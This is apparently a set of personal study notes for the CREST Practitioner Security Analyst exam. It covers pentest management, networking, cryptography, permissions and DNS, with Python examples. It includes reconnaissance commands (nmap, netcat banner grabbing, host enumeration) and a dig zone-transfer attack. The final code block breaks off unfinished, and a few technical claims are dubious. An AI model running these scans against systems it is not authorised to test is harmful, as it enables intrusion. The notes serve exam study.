DJ Wong
© DJ Wong 2026 | This site is powered by me.


Based on Syllabus 2.3
https://www.crest-approved.org/examination/practitioner-security-analyst/index.html


A: Soft Skills and Assessment Management

For this Appendix A, think about how you would accomplish each requirement. As these are soft skills and depend on the scenario, there are no hard answers.

A1: Engagement Lifecycle

  • Benefits and utility of penetration testing to the client.
  • Structure of penetration testing, including the relevant processes and procedures.
  • Concepts of infrastructure testing and application testing, including black box and white box formats.
  • Project closure and debrief

Black box format: the pentester knows nothing about the application or environment.

Grey box format: the pentester has some information, and is possibly given some user access for testing.

White box format: the pentester is given all infrastructure information or even the relevant source code. Vulnerabilities found through source code review and static analysis can then be used to direct the attack.

A2: Law and Compliance

Knowledge of pertinent UK legal issues:
- Computer Misuse Act 1990
- Human Rights Act 1998
- Data Protection Act 1998
- Police and Justice Act 2006
Impact of this legislation on penetration testing activities.
Awareness of sector-specific regulatory issues.

A3: Scoping

  • Understanding client requirements.
  • Scoping project to fulfil client requirements.
  • Accurate timescale scoping.
  • Resource planning.

A4: Understanding, Explaining and Managing Risk

  • Knowledge of additional risks that penetration testing can present.
  • Levels of risk relating to penetration testing, the usual outcomes of such risks materialising and how to mitigate the risks.
  • Effective planning for potential DoS conditions.

If possible, do not pentest production environments.
However, smaller companies with fewer resources often have no alternative, so the test has to run on production.

Some additional risks:
- Personal data is accessed. Make sure this is part of the agreed scope, and do not store or send on the information found. The person reviewing the pentest results may not be authorised to view the personal data.
- Denial of Service conditions. Make sure the dev team has backups or a contingency plan available. If the test is done on production, perhaps run it at night or when usage of the application is low.
- Remove all payloads that you have put in. If any configuration files were changed, change them back. It is best to have the dev team do the reverts.
- Do not use any tools that you do not understand. Tools found online may be useful, but malware may have been inserted along with them. A tool may also behave in a way that causes unexpected side effects, so be careful.

A5: Record Keeping, Interim Reporting & Final Results

  • Understanding reporting requirements.
  • Understanding the importance of accurate and structured record keeping during the engagement.

After the initial pentest, there may be a requirement for another pentest after rectifying the issues found as well.

B: Core Technical Skills


B1: IP Protocols

Requirements:
IP protocols: IPv4 and IPv6, TCP, UDP and ICMP.
Awareness that other IP protocols exist.

Internet Protocol V4

32 bits, usually written as four base-10 numbers (dotted decimal).
Range: 0.0.0.0 to 255.255.255.255
In binary, the top of the range is 11111111.11111111.11111111.11111111


Internet Protocol V6

128 bits, usually written as eight groups of base-16 (hexadecimal) digits.
Range: 0000:0000:0000:0000:0000:0000:0000:0000 to ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

A good breakdown, written by Lawrence Williams:
https://www.guru99.com/difference-ipv4-vs-ipv6.html

Transmission Control Protocol(TCP)

Commonly used for web technologies.
Provides sequencing, error checking and similar mechanisms, hence it offers reliable data transmission.

User Datagram Protocol UDP

Commonly used for data that does not need checking, such as video streaming.
Does not have sequencing and error checking.

More reading:
https://www.lifesize.com/en/blog/tcp-vs-udp/

Internet Control Message Protocol (ICMP)

Commonly used by routers, network devices and interfaces to check for errors and operational information within a network.

For example, the well-known ping command runs over ICMP:
ping 127.0.0.1

B2: Network Architectures

Requirements:
Varying network types that could be encountered during a penetration test:
• CAT 5 / Fibre
• 10/100/1000baseT
• Token ring
• Wireless (802.11)
Security implications of shared media, switched media and VLANs.

10/100/1000baseT

1000BASE-T (also known as IEEE 802.3ab) is a standard for Gigabit Ethernet over copper wiring.

Each 1000BASE-T network segment is recommended to be a maximum length of 100 meters (330 feet), and must use Category 5 cable or better (including Cat 5e and Cat 6).

https://en.wikipedia.org/wiki/Gigabit_Ethernet
https://en.wikipedia.org/wiki/2.5GBASE-T_and_5GBASE-T

1000BASE-T is Gigabit ethernet.
100BASE-T is Fast ethernet.

More here at:
https://en.wikipedia.org/wiki/Category_5_cable, under applications

Cat 5, 5e, 6, 7 Ethernet Cables

Mbps = megabits per second
Gbps = gigabits per second

Cable    Max frequency    Potential throughput
Cat 5    100 MHz          100 Mbps
Cat 5e   100 MHz          1 Gbps
Cat 6    250 MHz          1 Gbps
Cat 7    600 MHz          10 Gbps

These cables are rarely shielded, hence they are susceptible to solar flares and electromagnetic interference.

Implications: a strong magnet near a cable can interfere with communications.
We can also splice a cable to perform man-in-the-middle attacks on the physical link.

Optical Fibre Cables

https://en.wikipedia.org/wiki/Fiber-optic_communication

Optical fibre uses light rather than electrical signals to carry data, and the cables are fragile.
Often used to carry large amounts of data, e.g. international undersea internet cables and the links from Internet Service Providers to homes or local hubs.

Token Ring

A competitor to Ethernet in the 1980s, developed by IBM.
Rarely used in a modern context; most likely seen in legacy IBM systems.

Wireless (802.11)

Technical standard for wireless local area network.

IEEE 802.11 uses various frequencies including, but not limited to, the 2.4 GHz, 5 GHz, 6 GHz, and 60 GHz frequency bands.

In 2021, we will likely see 802.11ac wireless routers in electronics shops and office network setups.
https://en.wikipedia.org/wiki/IEEE_802.11

Virtual Local Area Network(VLAN)

VLANs are often used to separate out groups of users or servers.
For example:
- Executive department: 10.1.1.XXX
- Sales department: 192.168.10.XXX
- Guest: 10.20.33.30-45
- Voice over IP (think Cisco office phones)
- Storage Area Network (SAN)
- Et cetera.

VLANs allow this separation to run on the same physical network hardware, without geographical limitations.

https://en.wikipedia.org/wiki/Virtual_LAN

Security implications of shared media,switched media and VLANs.

We can use VLANs for access control.
A person on the Guest network cannot access any data in the Sales department.

This also means that if the Sales department suffers an attack, the data in the Executive department is safe, even though they are all in the same office.

Advanced settings can allow some cross-VLAN communication.

B4: Network Mapping & Target Identification

Requirements:
Analysis of output from tools used to map the route between the engagement point and a number of targets.
Network sweeping techniques to prioritise a target list and the potential for false negatives.

nmap <target_ip>

When nmap reports a port as "filtered", there is likely a firewall or some other issue between us and the target.

We can use netcat or telnet to talk directly to the port to confirm the scan results.

B5: Interpreting Tool Output

Requirements:
Interpreting output from port scanners, network sniffers and other network enumeration tools.

Common network tools:
1. nmap
2. wireshark
3. tcpdump

B6: Filter avoidance techniques

Requirements:
The importance of egress and ingress filtering, including the risks associated with outbound connections.

Ingress Filtering

https://www.ncsc.gov.ie/emailsfrom/DDoS/Ingress-Egress/index.html

Ingress filtering is the practice of monitoring, controlling and restricting traffic entering a network with the objective of ensuring that only legitimate traffic is allowed to enter and that unauthorised or malicious traffic is prevented from doing so.

i.e. inbound traffic filtering.

For example, a file sharing device in an office should only receive packets from an IP within the office, or the restricted VLAN. We can ensure that the firewall rules are set as such.

Egress Filtering

Egress filtering is the practice of monitoring, controlling and restricting traffic leaving a network with the objective of ensuring that only legitimate traffic is allowed to leave and that unauthorised or malicious traffic is prevented from doing so.

i.e. outbound traffic filtering.

For example, we do not want to leak data to the world over SMB (port 445).
We should block outbound traffic on port 445, or, if it is in use in the organisation, restrict it to known hosts or IP addresses.

Egress filtering is also important to prevent attackers from obtaining reverse shells, since a reverse shell relies on an outbound connection from the compromised host.

B8: OS Fingerprinting

Requirements:
- Remote operating system fingerprinting;
- active and passive techniques.

https://resources.infosecinstitute.com/topic/must-know-os-fingerprinting/

Active Fingerprinting

Directly send packets to find out information about a device.
e.g. an Nmap scan is active fingerprinting. Once we see NetBIOS, SMB and MSRPC services running, we can safely assume it is a Windows machine.

Likely to be caught by Intrusion Prevention/Detection Systems.

Passive Fingerprinting

Uses sniffing instead. Less likely to be detected.

Wireshark - Good for manual analysis
NetworkMiner - Good for automatic extraction of files, emails, etc.
https://www.netresec.com/?page=networkminer

B9: Application Fingerprinting and Evaluating Unknown Services

Requirements:
Determining server types and network application versions from application banners. Evaluation of responsive but unknown network applications.

Netcat, telnet

nc <target_ip> <target_port>

telnet <target_ip> <target_port>

For SMTP, we can send "HELO" or "EHLO". If there is a response, then it is confirmed that it is an SMTP or ESMTP service.

For web, we can send "GET / HTTP/1.1" (followed by a "Host:" line and a blank line) to see whether there is an HTTP response. Even a "400 Bad Request" reply confirms that an HTTP server is listening.
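As an added example (not part of the original notes), the following Python classifies responses captured from an unknown port the way the notes describe: SSH and HTTP identify themselves in the first line, while SMTP and FTP both greet with 220 and need the rest of the exchange to tell them apart. The responses are constructed samples, not real captures.

```python
import re

# Constructed sample responses (not real captures), as netcat/telnet would
# show them after connecting and, for HTTP, sending "GET / HTTP/1.1".
SAMPLE_RESPONSES = {
    "smtp": "220 mail.example.test ESMTP Postfix\r\n250-mail.example.test\r\n250 STARTTLS\r\n",
    "http": "HTTP/1.1 400 Bad Request\r\nServer: Apache/2.4.41 (Ubuntu)\r\nContent-Length: 0\r\n\r\n",
    "ssh": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3\r\n",
    "ftp": "220 (vsFTPd 3.0.3)\r\n",
    "binary": "\x00\x01\x02\xff",
}


def classify_banner(response: str) -> dict:
    """Guess the service and product from the first bytes a port sends back.

    Returns {"service": ..., "product": ..., "note": ...}; "product" is None
    when nothing version-like is visible.
    """
    lines = [ln.strip() for ln in response.splitlines() if ln.strip()]
    first = lines[0] if lines else ""

    if first.startswith("SSH-"):
        # SSH identification string is "SSH-<protoversion>-<softwareversion>"
        parts = first.split("-", 2)
        return {"service": "ssh", "product": parts[2] if len(parts) == 3 else None,
                "note": "SSH identification string"}

    if first.startswith("HTTP/"):
        # The Server header (if present) gives product and version.
        server = next((ln.split(":", 1)[1].strip() for ln in lines
                       if ln.lower().startswith("server:")), None)
        return {"service": "http", "product": server,
                "note": f"HTTP status line: {first}"}

    if first.startswith("220"):
        # Both SMTP and FTP greet with 220, so look at the rest of the text.
        m = re.match(r"220[ -](\S+)\s+(E?SMTP)\s*(.*)", first)
        if m or any(ln.startswith("250") for ln in lines):
            product = (m.group(3).strip() or None) if m else None
            return {"service": "smtp", "product": product,
                    "note": "220 greeting with SMTP keyword or 250 replies to EHLO"}
        if "ftp" in first.lower():
            return {"service": "ftp", "product": first[3:].strip(" -()"),
                    "note": "220 greeting naming an FTP daemon"}
        return {"service": "unknown", "product": None,
                "note": "220 greeting: could be SMTP or FTP, send EHLO to tell them apart"}

    # No text banner: count printable characters to spot a binary protocol.
    printable = sum(ch.isprintable() for ch in response)
    if response and printable < len(response) / 2:
        return {"service": "unknown", "product": None,
                "note": "non-text response: a binary protocol, not a text banner"}
    return {"service": "unknown", "product": None, "note": "no recognised banner"}
```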

B10: Network Access Control Analysis

Requirements:
Reviewing firewall rule bases and network access control lists.

https://www.cisco.com/c/en/us/products/security/what-is-network-access-control-nac.html

B11: Cryptography

Requirements:

Differences between encryption and encoding.

Symmetric / asymmetric encryption

Encryption algorithms: DES, 3DES, AES,RSA, RC4.

Hashes: SHA1 and MD5

Message Integrity codes: HMAC

11.1: Encryption and Encoding

Encoding is a common "language" for formatting data so that different devices, services and applications can understand each other.
See UTF-8 and Unicode:
https://en.wikipedia.org/wiki/Unicode

https://www.ascii-code.com/
ASCII is an early encoding format. We can encode letters and symbols into HTML entities, for example, so that browsers know how to display them.

Encoding is not meant for security.


Encryption is meant for security.
Data can be locked with a key, or passphrase. The receiver of the data needs the key to decrypt and access the data.

Without the key, even if we have the encrypted data on hand, the data is meaningless.

11.1.1: Symmetric Encryption

Both sender and receiver use the same key to encrypt and decrypt data.
For example the Caesar cipher; ROT13 is the Caesar cipher with a shift of 13.

Plaintext: I am no good at math

Encrypt with ROT13: V nz ab tbbq ng zngu

Decrypting with ROT13: I am no good at math

Several symmetric encryption standards are in common use today (see 11.2).

11.1.2: Asymmetric Encryption

Uses mathematics to produce a Public and Private key. Also called public-key cryptography.
https://en.wikipedia.org/wiki/Public-key_cryptography

A holds private and public key.

A sends public key out to B.

B encrypts data with the public key and sends it back to A.

A decrypts the ciphertext data with the private key.

This is more secure for key distribution: even if the public key is stolen, the data is not affected, as the public key cannot be used to decrypt.

However, if the private key is leaked, then the security of the data transaction is compromised.

Often used in current web technologies such as HTTPS.
Some encryption algorithms:

RSA

11.2: Encryption algorithms: DES, 3DES, AES,RSA, RC4.

11.2.1: Data Encryption Standard(DES)

https://en.wikipedia.org/wiki/Data_Encryption_Standard
Old; superseded by AES.

Symmetric Encryption

11.2.2: Triple DES (3DES)

https://en.wikipedia.org/wiki/Triple_DES
A strengthened variant of DES, more secure than single DES. Still popular in the electronic payment industry.

Symmetric Encryption

11.2.3: Advanced Encryption Standard AES

https://en.wikipedia.org/wiki/Advanced_Encryption_Standard
Key sizes:
1. AES-128 (128-bit key)
2. AES-192 (192-bit key)
3. AES-256 (256-bit key)

11.2.4: RSA

https://en.wikipedia.org/wiki/RSA_(cryptosystem)
Common usage in SSL/TLS and HTTPS web technologies.
Asymmetric Encryption

11.2.5: RC4

Considered insecure. Removed from use in TLS in 2015.

11.3: Hashing

Hashing is used for error checking of data, amongst other uses. It is also commonly used to store passwords as hashes rather than in plaintext.
https://en.wikipedia.org/wiki/Hash_function

The data is "hashed", or chopped up like diced onions. We cannot put the data back together: hashing is one-way.

Suppose we have two files, A and B. If the hashes of the two files are the same, we can be assured that the data is intact and has not been tampered with or corrupted (as long as an attacker cannot also replace the published hash; that is what HMAC, 11.3.4, is for).

11.3.1: MD5

"hello"
5d41402abc4b2a76b9719d911017c592

The word "hello" is turned into the 32-character hexadecimal string that we see.

MD5 is considered a weak hash and is not recommended for storing passwords. It is still used for error checking.

11.3.2: SHA-1

https://en.wikipedia.org/wiki/SHA-1
Considered weak.

11.3.3: SHA-2,3

SHA2 and 3 are the updated versions of the SHA algorithm family.
Commonly, we will see SHA-256 and SHA-512 in 2021.

11.3.4: HMAC

https://en.wikipedia.org/wiki/HMAC

https://en.wikipedia.org/wiki/Message_authentication_code

Used for authenticating messages: a MAC built from a hash function and a secret key, so only parties holding the key can produce or verify the tag.
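An added example (not from the original notes) showing the difference between the plain hash check of 11.3 and an HMAC: a hash detects accidental corruption, but an attacker who can replace both the file and its published hash goes unnoticed, whereas an HMAC tag cannot be forged without the key. All data and the key are constructed.

```python
import hashlib
import hmac


def md5_hex(data: bytes) -> str:
    """MD5 digest as hex; fine for error checking, not for password storage."""
    return hashlib.md5(data).hexdigest()


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def integrity_ok(data: bytes, published_hash: str) -> bool:
    """Plain hash check from 11.3: does the data match the hash we were given?"""
    return hmac.compare_digest(sha256_hex(data), published_hash)


def make_tag(key: bytes, message: bytes) -> str:
    """HMAC-SHA256 tag: only holders of `key` can compute this."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def authentic(key: bytes, message: bytes, tag: str) -> bool:
    """Verify in constant time, so timing does not leak how many bytes matched."""
    return hmac.compare_digest(make_tag(key, message), tag)


def demo() -> dict:
    """Walk through both checks on constructed data; returns the outcomes."""
    key = b"shared-secret-agreed-out-of-band"     # constructed, not a real key
    original = b"invoice total: 100.00"
    tampered = b"invoice total: 900.00"

    # 1. Accidental corruption: the plain hash catches it.
    published = sha256_hex(original)
    corruption_detected = not integrity_ok(tampered, published)

    # 2. Deliberate tampering where the attacker can also replace the published
    #    hash (e.g. hash and file sit on the same web page): the hash is useless.
    attacker_hash = sha256_hex(tampered)
    hash_fooled = integrity_ok(tampered, attacker_hash)

    # 3. HMAC: without the key the attacker cannot produce a matching tag.
    tag = make_tag(key, original)
    forged_tag = make_tag(b"guess", tampered)
    hmac_rejects_forgery = not authentic(key, tampered, forged_tag)
    hmac_accepts_genuine = authentic(key, original, tag)

    return {
        "md5_hello": md5_hex(b"hello"),
        "corruption_detected": corruption_detected,
        "hash_fooled_by_attacker": hash_fooled,
        "hmac_rejects_forgery": hmac_rejects_forgery,
        "hmac_accepts_genuine": hmac_accepts_genuine,
    }
```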

B12: Applications of Cryptography

Requirements:
SSL, IPsec, SSH, PGP
Common wireless (802.11) encryption protocols: WEP, WPA, TKIP

Secure Sockets Layer(SSL) / Transport Layer Security(TLS)

https://en.wikipedia.org/wiki/Transport_Layer_Security#SSL_1.0,_2.0,_and_3.0

Main points:
- SSL 3.0 was deprecated in 2015, as it was deemed vulnerable.
- TLS took over from SSL.
- TLS 1.3 is the latest version, defined in 2018.
- SSL/TLS is used to secure web traffic for HTTPS.
- A certificate is generated for the server (e.g. with OpenSSL) for SSL/TLS to use.

Generating a self-signed certificate for your website:
https://www.digitalocean.com/community/tutorials/openssl-essentials-working-with-ssl-certificates-private-keys-and-csrs

Internet Protocol Security(IPSec)

In computing, Internet Protocol Security (IPsec) is a secure network protocol suite that authenticates and encrypts the packets of data to provide secure encrypted communication between two computers over an Internet Protocol network. It is used in virtual private networks (VPNs).

One of the two common VPN tunnelling protocols (the other is TLS/SSL). It also encrypts the data being communicated.

https://en.wikipedia.org/wiki/IPsec

Other tunnelling protocols for VPNs: https://en.wikipedia.org/wiki/Virtual_private_network

Secure-Shell (SSH)

https://en.wikipedia.org/wiki/Secure_Shell

https://www.openssh.com/

SSH is used for remote access to a server/computer.

Pretty Good Privacy(PGP)

https://en.wikipedia.org/wiki/Pretty_Good_Privacy
https://www.openpgp.org/
https://www.varonis.com/blog/pgp-encryption/

An encryption program used to encrypt emails and hard disks.
It also verifies the identity of the sender (digital signatures).

Initially used by activists and journalists to secure data and communications (Varonis.com, Sep 2021).

B13: File system Permissions

Requirements:
File permission attributes within Unix and Windows file systems and their security implications.
Analysing registry ACLs.

Linux

ls -la

The above command lists files with their attributes.

You will see the permissions as three groups:

owner - group - others

with each group written as an octal digit, e.g. 7 7 7 (read, write and execute for everyone).

https://www.guru99.com/file-permissions.html

Important attributes are: SUID bits, execution bits, what each group can do, and what the "others" permission allows.
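An added example (not from the original notes) that decodes the mode strings shown by `ls -la` and flags the attributes listed above (SUID/SGID, world-writable files, sticky directories). The listing it audits is constructed, not taken from a real host.

```python
import re

# Constructed `ls -la` output (not from a real host).
SAMPLE_LS = """\
-rwsr-xr-x  1 root  root   68208 Mar 23  2023 /usr/bin/passwd
-rw-rw-rw-  1 alice alice    120 Jan  1 12:00 /home/alice/notes.txt
drwxrwxrwt 10 root  root    4096 Jan  1 12:00 /tmp
-rwxr-xr-x  1 root  root     100 Jan  1 12:00 /usr/local/bin/backup.sh
-rw-r-----  1 root  shadow  1234 Jan  1 12:00 /etc/shadow
-rwxrwxrwx  1 bob   bob      300 Jan  1 12:00 /opt/app/run.sh
"""

# mode, link count, owner, group, size, month, day, time-or-year, name
LS_LINE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\S+\s+\S+\s+(?P<name>.+)$"
)


def parse_mode(mode: str) -> dict:
    """Decode a 10-character ls mode string such as '-rwsr-xr-x' into its bits."""
    if len(mode) != 10:
        raise ValueError(f"bad mode string: {mode!r}")
    special = 0            # SUID=4, SGID=2, sticky=1 (the leading octal digit)
    digits = []
    for idx, triad in enumerate((mode[1:4], mode[4:7], mode[7:10])):
        value = 4 * (triad[0] == "r") + 2 * (triad[1] == "w")
        x = triad[2]
        if x in "xst":                   # lowercase: the execute bit really is set
            value += 1
        if x in "sS" and idx == 0:       # uppercase S/T: special bit without execute
            special |= 4
        elif x in "sS" and idx == 1:
            special |= 2
        elif x in "tT" and idx == 2:
            special |= 1
        digits.append(value)
    octal = "".join(str(d) for d in digits)
    return {
        "type": mode[0],
        "octal": f"{special}{octal}" if special else octal,
        "suid": bool(special & 4),
        "sgid": bool(special & 2),
        "sticky": bool(special & 1),
        "world_writable": bool(digits[2] & 2),
        "world_readable": bool(digits[2] & 4),
    }


def audit(ls_output: str) -> list:
    """Return (path, finding) pairs for the attributes B13 calls important."""
    findings = []
    for line in ls_output.splitlines():
        m = LS_LINE.match(line)
        if not m:
            continue                     # skips 'total N' and malformed lines
        bits = parse_mode(m["mode"])
        path, owner, group = m["name"], m["owner"], m["group"]
        if bits["suid"]:
            findings.append((path, f"SUID binary runs as {owner}"))
        if bits["sgid"]:
            findings.append((path, f"SGID set, runs with group {group}"))
        if bits["world_writable"]:
            if bits["type"] == "d" and bits["sticky"]:
                findings.append((path, "world-writable directory, sticky bit limits deletion"))
            else:
                findings.append((path, "world-writable: any local user can modify it"))
    return findings
```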

Windows

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls

icacls <file_path>

For permissions that will be displayed, see link, under "Remarks" section.

B14: Audit Techniques

Requirements:
Listing processes and their associated network sockets (if any).
Assessing patch levels.
Finding interesting files.

Linux

uname -a

ps aux

sudo lsof -i -P -n | grep LISTEN

netstat -ano

Windows

General information:

systeminfo

Patch Level:

wmic qfe get Caption,Description,HotFixID,InstalledOn

Services:

wmic service list brief

Network status and services:

netstat -ano

Extras 1: Binary, Decimal and Hexadecimal Calculations

Binary:

1 byte has 8 bits.

Bit:     7    6    5    4    3    2    1    0
Weight:  2^7  2^6  2^5  2^4  2^3  2^2  2^1  2^0
Value:   128  64   32   16   8    4    2    1

For 1 byte with the value 1111 1111:

Bit:     7    6    5    4    3    2    1    0
Value:   1    1    1    1    1    1    1    1

Which gives us 128 + 64 + 32 + 16 + 8 + 4 + 2 + 1 = 255 (decimal, base 10, representation).

Hexadecimal: remember that hexadecimal has 16 digits, starting at 0 and ending at F. Each hex digit covers 4 bits.

Bit:     3    2    1    0
Value:   1    1    1    1

8 + 4 + 2 + 1 = 15 = F

Value of 1111 1111 in hexadecimal representation:

Bit:     7    6    5    4    3    2    1    0
Value:   1    1    1    1    1    1    1    1
Hex:          F                   F

1 byte of data with the value 11111111 can be represented as:
- 11111111 (binary)
- 255 (decimal)
- FF (hexadecimal)

Extras 2: MAC Address

A media access control address (MAC address) is a unique identifier assigned to a network interface controller (NIC) for use as a network address in communications within a network segment. This use is common in most IEEE 802 networking technologies, including Ethernet, Wi-Fi, and Bluetooth. Source:https://en.wikipedia.org/wiki/MAC_address

48-bit (6 byte) address space.

Example: A MAC address of 2c549188c9e3 is typically displayed as 2C:54:91:88:C9:E3 or 2c-54-91-88-c9-e3. Source: https://slts.osu.edu/articles/whats-a-mac-address-and-how-do-i-find-it/

The digits are hexadecimal.

EXTRAS 3: Network Classes and calculation

Source: https://en.wikipedia.org/wiki/Classful_network

Network class   Size of host (rest) bit field   Addresses per network   Default subnet mask   CIDR notation
A               24                              2^24 = 16,777,216       255.0.0.0             /8
B               16                              2^16 = 65,536           255.255.0.0           /16
C               8                               2^8 = 256               255.255.255.0         /24

Extras 3.1: Subnet calculation for number of addresses

Why is 255.255.255.0 denoted as /24?

11111111.11111111.11111111.00000000

There are 24 leading 1-bits. How do we calculate non default subnet mask ranges?

CIDR notation   Binary representation                  Decimal representation
/25             11111111.11111111.11111111.10000000    255.255.255.128
/23             11111111.11111111.11111110.00000000    255.255.254.0

Write down the number of leading 1-bits, pad with 0-bits to 32 bits, and convert each group of 8 bits to decimal.

https://www.calculator.net/ip-subnet-calculator.html
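An added Python example (not from the original notes) that carries out the Extras 1 and Extras 3.1 calculations: one byte in binary/decimal/hex, a CIDR prefix turned into its binary and dotted-decimal mask with the number of addresses, the reverse check that a mask's 1-bits are contiguous, and the network/broadcast range a host falls in.

```python
def byte_representations(value: int) -> dict:
    """One byte shown as binary, decimal and hexadecimal (Extras 1)."""
    if not 0 <= value <= 255:
        raise ValueError("a byte holds 0..255")
    return {"binary": f"{value:08b}", "decimal": value, "hex": f"{value:02X}"}


def ip_to_int(ip: str) -> int:
    """Dotted-quad string to a 32-bit integer, validating each octet."""
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"not a dotted-quad IPv4 address: {ip}")
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]


def int_to_ip(value: int) -> str:
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def cidr_to_mask(prefix: int) -> dict:
    """Write `prefix` leading 1-bits, pad to 32 bits, read off the octets (Extras 3.1)."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix length must be 0..32")
    bits = "1" * prefix + "0" * (32 - prefix)
    groups = [bits[i:i + 8] for i in range(0, 32, 8)]
    addresses = 2 ** (32 - prefix)
    return {
        "binary": ".".join(groups),
        "decimal": ".".join(str(int(g, 2)) for g in groups),
        "addresses": addresses,
        # network and broadcast addresses are reserved on ordinary subnets
        # (/31 point-to-point links and /32 host routes are the exceptions)
        "usable_hosts": addresses - 2 if prefix <= 30 else addresses,
    }


def mask_to_cidr(mask: str) -> int:
    """Count the leading 1-bits of a dotted mask, rejecting non-contiguous masks."""
    bits = f"{ip_to_int(mask):032b}"
    prefix = len(bits) - len(bits.lstrip("1"))
    if bits != "1" * prefix + "0" * (32 - prefix):
        raise ValueError(f"{mask} is not a valid subnet mask (1-bits must be contiguous)")
    return prefix


def network_range(ip: str, prefix: int) -> tuple:
    """Network and broadcast address of the subnet that ip/prefix belongs to."""
    mask = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF
    network = ip_to_int(ip) & mask
    broadcast = network | (~mask & 0xFFFFFFFF)
    return int_to_ip(network), int_to_ip(broadcast)
```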

C: Background Information Gathering & Open Source

C1: Registration Records(Domain Name)

Information contained within IP and domain registries (WHOIS).

https://lookup.icann.org/

WHOIS usually holds the name and contact information of the person or organisation that registered the domain name.

C2: Domain Name Server(DNS)

DNS queries and responses

DNS zone transfers

Structure, interpretation and analysis of DNS records

DNS is used to translate a domain name, such as google.com, to an IP address.

Within an office, it is possible to set up local services that use DNS, e.g. http://salesfileshare.local

DNS Queries

1. Recursive Query

The DNS client sends a request to the DNS resolver. The resolver must return an answer; it queries other (authoritative) name servers on the client's behalf before returning one.

2. Iterative Query

The DNS client sends a request to the DNS resolver. The resolver returns the best answer it can. If it does not have the answer, it refers the client to other authoritative name servers, and the client queries them itself.

3. Non-Recursive Query

The DNS client sends a request to the DNS resolver. The resolver already knows the answer (for example from its cache, or because it is authoritative for the zone) and responds to the client immediately.

DNS Zone Transfers

https://www.sciencedirect.com/topics/computer-science/zone-transfer

Zone transfer is the process of copying the contents of the zone file on a primary DNS server to a secondary DNS server.

Used when deploying a new DNS server in local environment or internet.

DNS Zone Transfer Attack

dig axfr @<DNS_IP> <DOMAIN>

A zone transfer request for <DOMAIN> against the nameserver at <DNS_IP>; the domain argument is required, otherwise dig asks for the root zone.

If the nameserver allows transfers from anyone, the result reveals nameservers and subdomains that we can further enumerate or attack.

DNS Records

From Cloudflare:

A record - The record that holds the IP address of a domain.

CNAME record - Forwards one domain or subdomain to another domain; does NOT provide an IP address. Maps a hostname to another hostname (https://ns1.com/resources/cname).

MX record - Directs mail to an email server.

TXT record - Lets an admin store text notes in the record.

NS record - Stores the name server for a DNS entry.

SOA record - Stores admin information about a domain.

SRV record - Specifies a port for specific services.

PTR record - Provides a domain name in reverse-lookups.

source: https://www.cloudflare.com/learning/dns/dns-records/

HINFO stores host information, such as OS and CPU type.
https://simpledns.plus/help/hinfo-records

Difference Between A and CNAME

An A Record maps a hostname to one or more IP addresses, while the CNAME record maps a hostname to another hostname.
Source: https://ns1.com/resources/cname
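An added example (not from the CREST syllabus or dig) that ties the zone-transfer and record-type notes above together: it parses dig-style AXFR output for a constructed zone (example.test), counts the record types, lists the hostnames the transfer reveals, and flags what a defender would not want exposed (RFC 1918 addresses, HINFO, SRV).

```python
"""Summarise what an open zone transfer hands out.

Added example for these notes (not from the CREST syllabus, dig, or any tool's
own code). The zone below is constructed for a fictional domain, example.test.
"""
import ipaddress
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample: roughly what `dig axfr @ns1.example.test example.test`
# prints when the name server allows transfers to anyone.
SAMPLE_AXFR = """\
; <<>> DiG 9.18.1 <<>> axfr @ns1.example.test example.test
example.test.            3600 IN SOA   ns1.example.test. hostmaster.example.test. 2021090301 7200 3600 1209600 3600
example.test.            3600 IN NS    ns1.example.test.
example.test.            3600 IN NS    ns2.example.test.
example.test.            3600 IN MX    10 mail.example.test.
example.test.            3600 IN TXT   "v=spf1 mx -all"
ns1.example.test.        3600 IN A     192.0.2.53
mail.example.test.       3600 IN A     192.0.2.25
www.example.test.        3600 IN CNAME web01.example.test.
web01.example.test.      3600 IN A     192.0.2.80
web01.example.test.      3600 IN HINFO "x86_64" "Ubuntu 20.04"
intranet.example.test.   3600 IN A     10.10.5.20
_ldap._tcp.example.test. 3600 IN SRV   0 100 389 dc01.example.test.
dc01.example.test.       3600 IN A     10.10.5.10
example.test.            3600 IN SOA   ns1.example.test. hostmaster.example.test. 2021090301 7200 3600 1209600 3600
;; Query time: 12 msec
"""

RR_LINE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+([A-Z]+)\s+(.*)$")
# RFC 1918 ranges: an A record pointing here exposes internal addressing.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


@dataclass(frozen=True)
class Record:
    name: str
    ttl: int
    rtype: str
    rdata: str


def parse_axfr(text: str) -> List[Record]:
    """Turn dig's AXFR output into records, skipping comment and blank lines."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith(";"):
            continue
        m = RR_LINE.match(line)
        if m:
            name, ttl, rtype, rdata = m.groups()
            records.append(Record(name.lower(), int(ttl), rtype, rdata.strip()))
    return records


def count_by_type(records: List[Record]) -> Dict[str, int]:
    return dict(Counter(r.rtype for r in records))


def hostnames(records: List[Record], zone: str) -> List[str]:
    """Owner names other than the zone apex: the subdomains a transfer reveals."""
    apex = zone.lower().rstrip(".") + "."
    return sorted({r.name for r in records if r.name != apex})


def internal_hosts(records: List[Record]) -> List[Tuple[str, str]]:
    """A records whose address is in RFC 1918 space."""
    hits = []
    for r in records:
        if r.rtype == "A" and any(ipaddress.ip_address(r.rdata) in n for n in RFC1918):
            hits.append((r.name, r.rdata))
    return hits


def findings(records: List[Record], zone: str) -> List[str]:
    """Defender's view: what one successful AXFR gave away."""
    notes = [f"{len(hostnames(records, zone))} hostnames enumerated without guessing"]
    notes += [f"internal address exposed: {n} -> {ip}" for n, ip in internal_hosts(records)]
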